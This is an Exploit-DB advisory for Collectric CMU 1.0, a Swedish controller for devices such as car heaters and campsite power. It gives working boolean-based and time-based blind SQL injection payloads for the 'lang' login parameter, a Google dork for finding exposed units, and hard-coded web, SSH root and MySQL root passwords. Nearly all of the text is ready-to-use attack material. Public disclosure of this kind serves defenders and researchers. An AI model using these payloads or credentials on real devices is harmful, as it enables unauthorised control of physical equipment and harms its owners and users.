Collectric CMU 1.0 - 'lang' Hard-Coded Credentials / SQL injection

EDB-ID:

45446

CVE:

N/A




Platform:

Hardware

Date:

2018-09-21


# Exploit Title: Collectric CMU 1.0 - 'lang' SQL injection
# Google Dork: "Inloggning Collectric CMU"
# Discoverer: Simon Brannstrom
# Date: 2018-09-15
# Vendor Homepage: http://ourenergy.se/
# Software Link: n/a
# Version: All known versions
# Tested on: Linux
# CVE: N/A
# About: Collectric CMU is a Swedish made controller device for electrical devices such as car heaters, 
# camping sites etc, powered by a NGW board running Linux 2.6.30 with a PHP admin interface. 
# More vulnerabilities exists, see my other vulnerability reports.

# Parameter: lang (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause

Payload: username=yUqg&lang=SWEDISH' AND 1320=1320 AND 'EXAr'='EXAr&password=zhdY&setcookie=setcookie&submit=Logga in

# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind

Payload: username=yUqg&lang=SWEDISH' AND SLEEP(5) AND 'kglV'='kglV&password=zhdY&setcookie=setcookie&submit=Logga in


# Exploit Title: Collectric CMU - Hard-coded SSH/MySQL/Web credentials.
# Discoverer: Simon Brannstrom
# Date: 09/15/2018
# Vendor Homepage: http://ourenergy.se/
# Software Link: n/a
# Version: All known versions
# Tested on: Linux
# About: Collectric CMU is a Swedish made controller device for electrical devices such as car heaters, camping sites etc, powered by a NGW board running Linux 2.6.30 with a PHP admin interface.
More vulnerabilities exists, see my other vulnerability reports.

---
Web Portal hard-coded credentials:
username: sysadmin
password: zoogin

SSH user/root credentials:
username: kplc
password: kplc

username: root
password: zoogin

*The SSH server is running Dropbear sshd 0.52 (protocol 2.0) which requires diffie-hellman-group1-sha1.

MySQL root credentials:
username: root
password: sql4u
---